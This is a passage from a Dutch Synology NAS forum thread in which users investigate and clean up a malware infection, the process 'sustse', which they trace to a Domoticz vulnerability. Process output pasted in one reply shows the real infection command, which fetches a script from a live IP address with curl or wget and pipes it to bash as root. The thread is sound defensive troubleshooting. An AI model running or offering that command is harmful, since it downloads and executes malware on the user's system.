Auteur Topic: Process 'sustse' gebruikt volledige processor  (gelezen 8576 keer)

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1336
  • -Ontvangen: 7769
  • Berichten: 43.096
  • FIFO / LIFO
    • Truebase
Re: Process 'sustse' gebruikt volledige processor
« Reactie #15 Gepost op: 14 juni 2019, 15:28:40 »
DSM kan niet zonder root.
Je kunt wel een sterk wachtwoord instellen voor admin (het ww van root is namelijk die va admin)
Je kunt ook een nieuwe gebruiker maken met admin rechten en die ook een ster ww geven.
Als dat is gedaan, dan kan je admin uitschakelen.


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-7   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-7
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.3-25426-2   DS1515+   DSM 6.2.4-25556-7   DS220+    DSM 7.2.1-69057-4
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 6.2.4-25556-7   RT2600ac  SRM 1.2.5-8227-11
BeeDrive 1TB                                                                                                        MR2200ac  SRM 1.2.5-8227-11

Offline mc_

  • Bedankjes
  • -Gegeven: 12
  • -Ontvangen: 31
  • Berichten: 238
Re: Process 'sustse' gebruikt volledige processor
« Reactie #16 Gepost op: 14 juni 2019, 15:32:07 »
Hmm, verkeerde vraag, zie edit.

Heb inderdaad admin uitgeschakeld, eerste actie bij inrichten van DSM :-)
  • Mijn Synology: DS1520+
  • HDD's: WD80EDAZ/WD40EFRX

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1336
  • -Ontvangen: 7769
  • Berichten: 43.096
  • FIFO / LIFO
    • Truebase
Re: Process 'sustse' gebruikt volledige processor
« Reactie #17 Gepost op: 14 juni 2019, 15:45:21 »
Beetje gegoogled maar, volgens mij kan Domoticz niet zonder root.


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-7   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-7
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.3-25426-2   DS1515+   DSM 6.2.4-25556-7   DS220+    DSM 7.2.1-69057-4
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 6.2.4-25556-7   RT2600ac  SRM 1.2.5-8227-11
BeeDrive 1TB                                                                                                        MR2200ac  SRM 1.2.5-8227-11

Offline Henk Havelaar

  • Bedankjes
  • -Gegeven: 17
  • -Ontvangen: 8
  • Berichten: 139
Re: Process 'sustse' gebruikt volledige processor
« Reactie #18 Gepost op: 14 juni 2019, 23:10:55 »
Sinds gisteren heb ik hier ook last van, geen idee hoe het erop is gekomen. Alleen heb ik geen idee hoe ik die bestanden kan zien of verwijderen, is het process te "killen" met de DSM programma's of heb je daar Linux kennis voor nodig?
Wat is het IP adres van 'oanacroner1? dan kan ik dat in ieder geval blokkeren in de firewall.
  • Mijn Synology: DS1819+
  • HDD's: 8 x IronWolf Pro18TB
  • Extra's: 32 GB / 10 GBit netw
NAS: DS1819+ 8 xTB Seagate IronWolf  Pro 18TB. E10M20-T1 M.2 SSd & 10 GBe Combo adapter.

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 176
  • -Ontvangen: 2619
  • Berichten: 16.241
Re: Process 'sustse' gebruikt volledige processor
« Reactie #19 Gepost op: 14 juni 2019, 23:59:11 »
In elk geval is dit hetzelfde probleem als hier gemeld wordt.

In beide topics zit het commando om een executable file op te halen "107.174.47.156/mr.sh".

Beter om in één topic verder te gaan. Nu al 3 meldingen in 24 uur op dit forum. Ook elders zijn de meldingen steeds heel recent.
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR
  • Extra's: DS212J (Backup)

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 176
  • -Ontvangen: 2619
  • Berichten: 16.241
Re: Process 'sustse' gebruikt volledige processor
« Reactie #20 Gepost op: 15 juni 2019, 00:13:59 »
Toch niet zo recent. Er worden blijkbaar meerdere Amerikaanse IP adressen gebruikt uit een blok van een kwart miljoen adressen.

Als ik op zo'n IP google vind ik b.v. al 4 meldingen van ca 2 maand geleden op een site waar misbruik gemeld wordt:



Hoewel er niet vanaf dat IP gehacked is. De hack (of zelf gestarte, besmette software) is eerder binnengekomen en haalt op dat adres een script op voor verdere infectie.
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR
  • Extra's: DS212J (Backup)

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1336
  • -Ontvangen: 7769
  • Berichten: 43.096
  • FIFO / LIFO
    • Truebase
Re: Process 'sustse' gebruikt volledige processor
« Reactie #21 Gepost op: 15 juni 2019, 10:32:02 »
Beter om in één topic verder te gaan. Nu al 3 meldingen in 24 uur op dit forum. Ook elders zijn de meldingen steeds heel recent.
De 2 Topics samen gevoegd.


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-7   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-7
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.3-25426-2   DS1515+   DSM 6.2.4-25556-7   DS220+    DSM 7.2.1-69057-4
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 6.2.4-25556-7   RT2600ac  SRM 1.2.5-8227-11
BeeDrive 1TB                                                                                                        MR2200ac  SRM 1.2.5-8227-11

Offline mbomhof

  • Bedankjes
  • -Gegeven: 2
  • -Ontvangen: 4
  • Berichten: 18
Re: Process 'sustse' gebruikt volledige processor
« Reactie #22 Gepost op: 15 juni 2019, 10:59:45 »
Ook in bestand /etc/cron.d/apache trof ik soortgelijke regel aan.

Ik heb de bestanden in /etc/cron.d/ leeg gemaakt;
Ik heb het bestand in /etc/cron.hourly/ verwijderd;
Ik heb het bestand /var/tmp/wc.conf verwijderd;
Ik heb het bestand /var/tmp/sustse verwijderd;
Ik heb ip adres 107.174.47.156 in mijn firewall geblokkeerd;
Ik heb alle actieve processen die mr.sh bevatten gekilled (ps aux | grep mr.sh).

Ik draai inderdaad ook Domoticz en deze heb ik direct bijgewerkt naar de meest recente versies.

Ik zie momenteel geen processen meer gestart worden en ik zie geen bestanden meer terug komen.
Fingers crossed!

Dank voor alle reacties zo ver!
  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline mbomhof

  • Bedankjes
  • -Gegeven: 2
  • -Ontvangen: 4
  • Berichten: 18
Re: Process 'sustse' gebruikt volledige processor
« Reactie #23 Gepost op: 15 juni 2019, 11:02:21 »
Correctie, er worden nog wel sessies gestart...

root     14912  0.0  0.1   9604  1204 ?        Ss   11:00   0:00 /bin/sh -c (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
root     14914  0.0  0.0   9608   652 ?        S    11:00   0:00 /bin/sh -c (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
root     14916  0.0  0.5  85936  5468 ?        S    11:00   0:00 curl -s http://107.174.47.156/mr.sh
root     17968  0.0  0.1  23132   964 pts/6    S+   11:01   0:00 grep --color=auto mr.sh

(maar al wel een stuk minder).
  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline Henk Havelaar

  • Bedankjes
  • -Gegeven: 17
  • -Ontvangen: 8
  • Berichten: 139
Re: Process 'sustse' gebruikt volledige processor
« Reactie #24 Gepost op: 15 juni 2019, 11:05:28 »
@mbomhof, ik hoop dat het gaat lukken, ik draai ook DomoticZ op de NAS. Als het gelukt is om deze troep te stoppen kan je me dan vertellen wat ik moet doen? Ik ben een Linux leek.
  • Mijn Synology: DS1819+
  • HDD's: 8 x IronWolf Pro18TB
  • Extra's: 32 GB / 10 GBit netw
NAS: DS1819+ 8 xTB Seagate IronWolf  Pro 18TB. E10M20-T1 M.2 SSd & 10 GBe Combo adapter.

eaz

  • Gast
Re: Process 'sustse' gebruikt volledige processor
« Reactie #25 Gepost op: 15 juni 2019, 11:18:18 »
ook meldingen op domoticz forum:

https://www.domoticz.com/forum/viewtopic.php?f=6&t=28329&sid=aa8def5554c1013476538ee56924114d

edit: sorry, ik zie net dat dit al gepost was, door de merge erbij gekomen:-)

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 176
  • -Ontvangen: 2619
  • Berichten: 16.241
Re: Process 'sustse' gebruikt volledige processor
« Reactie #26 Gepost op: 15 juni 2019, 12:18:36 »
Bovenstaande link bevat een bevestiging dat de besmetting via een webpagina van domoticz verloopt die men via het internet toegankelijk gemaakt heeft.. CVE-2019-10664. Maar ook dat deze kwetsbaarheid in de nieuwste versies verholpen is.
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR
  • Extra's: DS212J (Backup)

Offline mc_

  • Bedankjes
  • -Gegeven: 12
  • -Ontvangen: 31
  • Berichten: 238
Re: Process 'sustse' gebruikt volledige processor
« Reactie #27 Gepost op: 15 juni 2019, 13:26:06 »
Met welk commando kan ik zien welke sessies worden opgestart? Wil graag nog even checken.

Complimenten overigens voor alle snelle reacties, mooi te zien hoe dit probleem aangepakt wordt door de community!  :)
  • Mijn Synology: DS1520+
  • HDD's: WD80EDAZ/WD40EFRX

Offline mbomhof

  • Bedankjes
  • -Gegeven: 2
  • -Ontvangen: 4
  • Berichten: 18
Re: Process 'sustse' gebruikt volledige processor
« Reactie #28 Gepost op: 15 juni 2019, 13:40:36 »
Met dit commando krijg je een lijst met alle processen die 'mr.sh' bevatten:

ps aux | grep mr.sh
  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 176
  • -Ontvangen: 2619
  • Berichten: 16.241
Re: Process 'sustse' gebruikt volledige processor
« Reactie #29 Gepost op: 15 juni 2019, 14:24:09 »
Hier nog een analyse van deze malware van september vorig jaar. (securityaffairs.co)

Geen oplossing voor het verwijderen, maar het geeft wel een idee wat mr.sh doet.
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR
  • Extra's: DS212J (Backup)


 

Download Speed and process priority conflict

Gestart door adsboelBoard SABnzbd (usenet)

Reacties: 4
Gelezen: 4301
Laatste bericht 26 maart 2008, 15:48:13
door adsboel
CPU facerecognition process

Gestart door erniekenBoard Synology DSM 5.1 en eerder

Reacties: 5
Gelezen: 6592
Laatste bericht 16 juli 2012, 19:21:21
door ernieken
Post-process-script Failure

Gestart door Chris12Board NZBGet

Reacties: 3
Gelezen: 4758
Laatste bericht 15 december 2014, 20:58:37
door Birdy
VERPLAATST: 100% CPU nginx: worker process

Gestart door BirdyBoard Synology Router

Reacties: 0
Gelezen: 540
Laatste bericht 11 maart 2021, 10:13:24
door Birdy
Process gebruik raid 5 of shr

Gestart door spikehomeBoard NAS hardware vragen

Reacties: 1
Gelezen: 1345
Laatste bericht 27 januari 2012, 09:27:50
door spikehome